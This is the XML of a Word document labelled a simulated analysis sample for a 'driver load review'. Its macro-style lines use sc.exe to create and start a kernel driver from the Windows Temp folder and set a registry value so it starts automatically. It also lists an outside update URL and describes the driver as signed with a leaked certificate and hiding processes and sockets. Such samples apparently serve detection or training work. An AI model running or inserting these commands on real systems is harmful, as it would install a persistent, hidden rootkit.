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 standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:body>
    <w:p><w:r><w:t xml:space="preserve">SIMULATED ARTIFACT - ANALYSIS SAMPLE - DRIVER LOAD REVIEW</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Module GhostKernelDriver</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Function LoadDriver()</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Shell("cmd.exe /c sc create ghostkern type= kernel binPath= C:\Windows\Temp\gk.sys")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Shell("cmd.exe /c sc start ghostkern")</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">RegWrite "HKLM\SYSTEM\CurrentControlSet\Services\GhostKernel\Start", "2"</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Update endpoint: https://driver-download.site/kernel/update.php?ref=9a8b7c6d&ver=2.1.4</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Driver signed with leaked certificate; hides processes and network sockets.</w:t></w:r></w:p><w:p><w:r><w:t xml:space="preserve">Installation log appended below for review.</w:t></w:r></w:p>
  </w:body>
</w:document>

</file>